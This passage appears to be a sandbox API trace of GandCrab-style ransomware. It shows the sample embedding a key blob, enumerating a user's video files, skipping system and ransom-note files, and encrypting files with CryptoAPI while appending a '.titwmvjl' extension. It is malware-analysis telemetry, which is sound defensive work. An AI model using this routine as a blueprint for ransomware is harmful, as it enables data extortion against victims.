35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0095.631] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0095.632] CloseHandle (hObject=0x2cc) returned 1 [0095.632] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.632] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.632] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x28, wMilliseconds=0x3ad)) [0095.632] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.632] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.632] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.633] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\d2ca4a09d2ca4deb61a.lock") returned 125 [0095.633] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0095.633] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.633] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.634] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\") returned 101 [0095.634] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\*" [0095.634] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x5034f8 [0095.634] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.634] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0095.634] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.634] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.634] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0095.634] lstrcmpW (lpString1="61CNZp0_g.flv", lpString2=".") returned 1 [0095.634] lstrcmpW (lpString1="61CNZp0_g.flv", lpString2="..") returned 1 [0095.634] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\", lpString2="61CNZp0_g.flv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\61CNZp0_g.flv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\61CNZp0_g.flv" [0095.634] lstrlenW (lpString=".titwmvjl") returned 9 [0095.634] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\61CNZp0_g.flv") returned 114 [0095.634] VirtualAlloc (lpAddress=0x0, dwSize=0x124, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.635] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\61CNZp0_g.flv.titwmvjl") returned 123 [0095.635] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\61CNZp0_g.flv") returned 114 [0095.635] lstrlenW (lpString=".flv") returned 4 [0095.635] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.635] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".flv ") returned 5 [0095.635] lstrcmpiW (lpString1=".flv", lpString2=".titwmvjl") returned -1 [0095.635] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.635] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\61CNZp0_g.flv") returned 114 [0095.635] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\61CNZp0_g.flv") returned 114 [0095.635] lstrcmpiW (lpString1="61CNZp0_g.flv", lpString2="desktop.ini") returned -1 [0095.635] lstrcmpiW (lpString1="61CNZp0_g.flv", lpString2="autorun.inf") returned -1 [0095.635] lstrcmpiW (lpString1="61CNZp0_g.flv", lpString2="ntuser.dat") returned -1 [0095.635] lstrcmpiW (lpString1="61CNZp0_g.flv", lpString2="iconcache.db") returned -1 [0095.635] lstrcmpiW (lpString1="61CNZp0_g.flv", lpString2="bootsect.bak") returned -1 [0095.635] lstrcmpiW (lpString1="61CNZp0_g.flv", lpString2="boot.ini") returned -1 [0095.635] lstrcmpiW (lpString1="61CNZp0_g.flv", lpString2="ntuser.dat.log") returned -1 [0095.635] lstrcmpiW (lpString1="61CNZp0_g.flv", lpString2="thumbs.db") returned -1 [0095.636] lstrcmpiW (lpString1="61CNZp0_g.flv", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.636] lstrcmpiW (lpString1="61CNZp0_g.flv", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.636] lstrcmpiW (lpString1="61CNZp0_g.flv", lpString2="KRAB-DECRYPT.html") returned -1 [0095.636] lstrcmpiW (lpString1="61CNZp0_g.flv", lpString2="CRAB-DECRYPT.html") returned -1 [0095.636] lstrcmpiW (lpString1="61CNZp0_g.flv", lpString2="KRAB-DECRYPT.txt") returned -1 [0095.636] lstrcmpiW (lpString1="61CNZp0_g.flv", lpString2="CRAB-DECRYPT.txt") returned -1 [0095.636] lstrcmpiW (lpString1="61CNZp0_g.flv", lpString2="ntldr") returned -1 [0095.636] lstrcmpiW (lpString1="61CNZp0_g.flv", lpString2="NTDETECT.COM") returned -1 [0095.636] lstrcmpiW (lpString1="61CNZp0_g.flv", lpString2="Bootfont.bin") returned -1 [0095.636] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\61CNZp0_g.flv") returned 114 [0095.636] lstrlenW (lpString=".flv") returned 4 [0095.636] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.636] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".flv ") returned 5 [0095.636] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.636] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.636] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\61CNZp0_g.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\61cnzp0_g.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0095.637] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.637] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0095.637] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.637] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.638] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0095.638] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.638] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.638] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.638] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0095.638] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.638] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.639] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.639] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.639] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0095.639] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.639] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.639] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.640] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0095.640] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.640] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.640] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.640] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.640] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0095.640] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.640] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5035b8) returned 1 [0095.641] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.641] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0095.641] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.641] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0095.641] GetLastError () returned 0x0 [0095.641] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.641] CryptDestroyKey (hKey=0x5035b8) returned 1 [0095.641] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.641] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.641] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.642] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0095.642] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.642] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, 